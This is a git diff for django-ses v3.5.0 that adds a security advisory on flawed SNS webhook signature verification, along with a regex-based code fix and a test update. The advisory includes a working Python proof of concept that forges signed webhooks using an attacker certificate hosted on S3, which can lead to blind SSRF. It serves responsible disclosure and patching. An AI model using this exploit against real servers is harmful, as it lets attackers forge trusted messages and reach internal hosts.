diff --git a/CVE/001-cert-url-signature-verification.md b/CVE/001-cert-url-signature-verification.md new file mode 100644 index 0000000..4b01ebd --- /dev/null +++ b/CVE/001-cert-url-signature-verification.md @@ -0,0 +1,227 @@ +# Certificate URL: signature verification exposure + +0. TL;DR: + +If you were using the default setting or any `amazonaws.com` subdomain for `AWS_SNS_EVENT_CERT_TRUSTED_DOMAINS`, +signature verification webhooks would have allowed someone hosting an arbitrary S3 bucket to send verified webhook +calls to your server. + +`django-ses==3.5.0` addresses this by matching the `amazonaws.com` certificate URLs against a known regex, `SES_REGEX_CERT_URL`. + +1. Overview + +The django_ses library implements a mail backend for Django using AWS Simple Email Service. +The library exports the `SESEventWebhookView` class intended to receive signed requests from AWS +to handle email bounces, subscriptions, etc. +These requests are signed by AWS and are verified by django_ses, however the verification of this +signature was found to be flawed as it allowed users to specify arbitrary public certificates. + +2. Description + +The [`SESEventWebhookView`](https://github.com/django-ses/django-ses/blob/3a3280382810268476cb6c71d4c66833257db0cc/django_ses/views.py#L379) +view class implements a [`post` handler](https://github.com/django-ses/django-ses/blob/3a3280382810268476cb6c71d4c66833257db0cc/django_ses/views.py#L409) +which receives signed requests. By default (as [noted](https://github.com/django-ses/django-ses/tree/master#full-list-of-settings) in the README) +signature verification is enabled. Signature verification is [performed](https://github.com/django-ses/django-ses/blob/3a3280382810268476cb6c71d4c66833257db0cc/django_ses/views.py#L420) +by the [`verify_event_message`](https://github.com/django-ses/django-ses/blob/3a3280382810268476cb6c71d4c66833257db0cc/django_ses/utils.py#L252) +utility function which uses the `EventMessageVerifier.is_verified` method. + +This method obtains the public certificate from a URL passed within the request +(https://github.com/django-ses/django-ses/blob/3a3280382810268476cb6c71d4c66833257db0cc/django_ses/utils.py#L166-L189): + +```py + def _get_cert_url(self): + """ + Get the signing certificate URL. + Only accept urls that match the domains set in the + AWS_SNS_EVENT_CERT_TRUSTED_DOMAINS setting. Sub-domains + are allowed. i.e. if amazonaws.com is in the trusted domains + then sns.us-east-1.amazonaws.com will match. + """ + cert_url = self._data.get("SigningCertURL") + if not cert_url: + logger.warning('No signing certificate URL: "%s"', cert_url) + return None + + if not cert_url.startswith("https://"): + logger.warning('Untrusted certificate URL: "%s"', cert_url) + return None + + url_obj = urlparse(cert_url) + for trusted_domain in settings.EVENT_CERT_DOMAINS: + parts = trusted_domain.split(".") + if url_obj.netloc.split(".")[-len(parts) :] == parts: + return cert_url + + return None +``` + +Some validation is performed on the certificate URL to ensure it is from a trusted domain. By default, the trusted domains are +(https://github.com/django-ses/django-ses/blob/3a3280382810268476cb6c71d4c66833257db0cc/django_ses/settings.py#L50-L61): + +```py +EVENT_CERT_DOMAINS = getattr( + settings, + 'AWS_SNS_EVENT_CERT_TRUSTED_DOMAINS', + getattr( + settings, + 'AWS_SNS_BOUNCE_CERT_TRUSTED_DOMAINS', + ( + 'amazonaws.com', + 'amazon.com', + ) + ) +) +``` + +However, the validation of the certificate URL allows for arbitrary subdomains. Because anyone can host arbitrary files on a +subdomain of `amazonaws.com` (through hosting an AWS S3 bucket), it is possible to host an arbitrary public certificate which +gets validated and used to verify signatures. + +3. Proof of Concept + +To test the vulnerability, we can create a Django app and install the library: + +```sh +django-admin startproject demo +cd demo +pip3 install django-ses[events] +``` + +Then, add the SESEventWebhookView view to the `urlpatterns` list in `urls.py`: + +```py +from django.urls import path +from django_ses.views import SESEventWebhookView + +urlpatterns = [ + path(r'ses/event-webhook/', SESEventWebhookView.as_view(), name='handle-event-webhook') +] +``` + +Run the server: + +```py +python manage.py runserver +``` + +This runs the server on port 8000. Notice that if you send a POST request to `/ses/event-webhook` +it will fail with "Signature verification failed.": + +```sh +curl -X POST http://localhost:8000/ses/event-webhook/ -d '{"Type":"SubscriptionConfirmation", "SubscribeURL": "https://example.com"}' +Signature verification failed. +``` + +The following Python script implements a proof of concept that signs an arbitrary payload using our attacker-controlled +private key. For convenience of testing, the certificate is available at + +https://django-sns-poc.s3.ap-southeast-2.amazonaws.com/publickey.cer + +and the private key is available at + +https://django-sns-poc.s3.ap-southeast-2.amazonaws.com/private.key + +```py +from cryptography.hazmat.primitives import serialization +from cryptography.hazmat.primitives import hashes +from cryptography.hazmat.primitives.asymmetric import padding +from cryptography.hazmat.primitives.asymmetric import utils +import json +import requests +from base64 import b64encode + +# https://github.com/django-ses/django-ses/blob/3a3280382810268476cb6c71d4c66833257db0cc/django_ses/utils.py#L191 +def _get_bytes_to_sign(_data): + """ + Creates the message used for signing SNS notifications. + This is used to verify the bounce message when it is received. + """ + + # Depending on the message type the fields to add to the message + # differ so we handle that here. + msg_type = _data.get('Type') + if msg_type == 'Notification': + fields_to_sign = [ + 'Message', + 'MessageId', + 'Subject', + 'Timestamp', + 'TopicArn', + 'Type', + ] + elif (msg_type == 'SubscriptionConfirmation' or + msg_type == 'UnsubscribeConfirmation'): + fields_to_sign = [ + 'Message', + 'MessageId', + 'SubscribeURL', + 'Timestamp', + 'Token', + 'TopicArn', + 'Type', + ] + else: + # Unrecognized type + return None + + bytes_to_sign = [] + for field in fields_to_sign: + field_value = _data.get(field) + if not field_value: + continue + + # Some notification types do not have all fields. Only add fields + # with values. + bytes_to_sign.append(f"{field}\n{field_value}\n") + + return "".join(bytes_to_sign).encode() + +cert_url = 'https://django-sns-poc.s3.ap-southeast-2.amazonaws.com/publickey.cer' +# privkey available here https://django-sns-poc.s3.ap-southeast-2.amazonaws.com/private.key +privkey = serialization.load_pem_private_key(open('./private.key','rb').read(), password=None) +target_endpoint = 'http://localhost:8000/ses/event-webhook/' + +payload = { + 'Type': 'SubscriptionConfirmation', + 'SubscribeURL': 'http://localhost:9999', +} + +sign_bytes = _get_bytes_to_sign(payload) +chosen_hash = hashes.SHA1() +hasher = hashes.Hash(chosen_hash) +hasher.update(sign_bytes) +digest = hasher.finalize() +sig = privkey.sign( + digest, + padding.PKCS1v15(), + utils.Prehashed(chosen_hash) +) +payload['SigningCertURL'] = cert_url +payload['Signature'] = b64encode(sig).decode() + +r = requests.post(target_endpoint, json=payload) +print(r.status_code) # this is 200, which indicates the message was accepted +``` + +3. Impact + +The impact may vary depending on the context of the application and how bounce events are +handled. Due to the fact that the library suggests that signatures are verified by default, +consumers may consider the data to be trusted and hence use it without appropriate validation. +At the very least, this issue allows a (blind) SSRF vulnerability through the `SubscriptionConfirmation` +event type, however I didn't note this having a very large impact on its own. + +4. Credits + +Joseph Surin, elttam + +5. Recommendations + +If you're not setting a value for `AWS_SNS_EVENT_CERT_TRUSTED_DOMAINS`, upgrade to `v3.5.0` and re-test your webhooks to make sure the +signature verification still passes. + +If you are setting a value for `AWS_SNS_EVENT_CERT_TRUSTED_DOMAINS` and it contains `amazonaws.com`, set the full domain instead. This +is best practice even if your domain is not `amazonaws.com`, to restrict the possible security risk of other subdomains sending +verifiable webhook calls. + +See `django-ses` [Releases](https://github.com/django-ses/django-ses/releases/tag/v3.5.0) for more details about the code changes. diff --git a/django_ses/utils.py b/django_ses/utils.py index 6cf7559..b97a1f9 100644 --- a/django_ses/utils.py +++ b/django_ses/utils.py @@ -1,21 +1,25 @@ import base64 import logging +import re import warnings from builtins import bytes - -from django_ses.deprecation import RemovedInDjangoSES20Warning - +from urllib.error import URLError from urllib.parse import urlparse from urllib.request import urlopen -from urllib.error import URLError from django.core.exceptions import ImproperlyConfigured + from django_ses import settings +from django_ses.deprecation import RemovedInDjangoSES20Warning logger = logging.getLogger(__name__) _CERT_CACHE = {} +SES_REGEX_CERT_URL = re.compile( + "(?i)^https://sns\.[a-z0-9\-]+\.amazonaws\.com(\.cn)?/SimpleNotificationService\-[a-z0-9]+\.pem$" +) + def clear_cert_cache(): """Clear the certificate cache. @@ -183,6 +187,17 @@ def _get_cert_url(self): url_obj = urlparse(cert_url) for trusted_domain in settings.EVENT_CERT_DOMAINS: parts = trusted_domain.split(".") + if "amazonaws.com" in trusted_domain: + if not SES_REGEX_CERT_URL.match(cert_url): + if len(parts) < 4: + return None + else: + logger.warning('Possible security risk for: "%s"', cert_url) + logger.warning( + "It is strongly recommended to configure the full domain in EVENT_CERT_DOMAINS. " + "See v3.5.0 release notes for more details." + ) + if url_obj.netloc.split(".")[-len(parts) :] == parts: return cert_url @@ -196,26 +211,28 @@ def _get_bytes_to_sign(self): # Depending on the message type the fields to add to the message # differ so we handle that here. - msg_type = self._data.get('Type') - if msg_type == 'Notification': + msg_type = self._data.get("Type") + if msg_type == "Notification": fields_to_sign = [ - 'Message', - 'MessageId', - 'Subject', - 'Timestamp', - 'TopicArn', - 'Type', + "Message", + "MessageId", + "Subject", + "Timestamp", + "TopicArn", + "Type", ] - elif (msg_type == 'SubscriptionConfirmation' or - msg_type == 'UnsubscribeConfirmation'): + elif ( + msg_type == "SubscriptionConfirmation" + or msg_type == "UnsubscribeConfirmation" + ): fields_to_sign = [ - 'Message', - 'MessageId', - 'SubscribeURL', - 'Timestamp', - 'Token', - 'TopicArn', - 'Type', + "Message", + "MessageId", + "SubscribeURL", + "Timestamp", + "Token", + "TopicArn", + "Type", ] else: # Unrecognized type @@ -237,14 +254,14 @@ def _get_bytes_to_sign(self): def BounceMessageVerifier(*args, **kwargs): warnings.warn( - 'utils.BounceMessageVerifier is deprecated. It is renamed to EventMessageVerifier.', + "utils.BounceMessageVerifier is deprecated. It is renamed to EventMessageVerifier.", RemovedInDjangoSES20Warning, ) # parameter name is renamed from bounce_dict to notification. - if 'bounce_dict' in kwargs: - kwargs['notification'] = kwargs['bounce_dict'] - del kwargs['bounce_dict'] + if "bounce_dict" in kwargs: + kwargs["notification"] = kwargs["bounce_dict"] + del kwargs["bounce_dict"] return EventMessageVerifier(*args, **kwargs) @@ -262,7 +279,7 @@ def verify_bounce_message(msg): Verify an SES/SNS bounce(event) notification message. """ warnings.warn( - 'utils.verify_bounce_message is deprecated. It is renamed to verify_event_message.', + "utils.verify_bounce_message is deprecated. It is renamed to verify_event_message.", RemovedInDjangoSES20Warning, ) return verify_event_message(msg) @@ -270,23 +287,24 @@ def verify_bounce_message(msg): def confirm_sns_subscription(notification): logger.info( - 'Received subscription confirmation: TopicArn: %s', - notification.get('TopicArn'), + "Received subscription confirmation: TopicArn: %s", + notification.get("TopicArn"), extra={ - 'notification': notification, + "notification": notification, }, ) # Get the subscribe url and hit the url to confirm the subscription. - subscribe_url = notification.get('SubscribeURL') + subscribe_url = notification.get("SubscribeURL") try: urlopen(subscribe_url).read() except URLError as e: # Some kind of error occurred when confirming the request. logger.error( - 'Could not confirm subscription: "%s"', e, + 'Could not confirm subscription: "%s"', + e, extra={ - 'notification': notification, + "notification": notification, }, exc_info=True, ) diff --git a/pyproject.toml b/pyproject.toml index cbf2f03..648b1a3 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -1,6 +1,6 @@ [tool.poetry] name = "django-ses" -version = "3.4.1" +version = "3.5.0" description = "A Django email backend for Amazon's Simple Email Service" authors = [ "Harry Marr ", diff --git a/tests/test_verifier.py b/tests/test_verifier.py index 94e2ece..c47b273 100644 --- a/tests/test_verifier.py +++ b/tests/test_verifier.py @@ -126,12 +126,15 @@ def test_get_cert_url(self): """ Test url trust verification """ + cert_url = ( + "https://sns.test-example.amazonaws.com/SimpleNotificationService-abcd.pem" + ) verifier = BounceMessageVerifier( { - "SigningCertURL": "https://amazonaws.com/", + "SigningCertURL": cert_url, } ) - self.assertEqual(verifier._get_cert_url(), "https://amazonaws.com/") + self.assertEqual(verifier._get_cert_url(), cert_url) def test_http_cert_url(self): """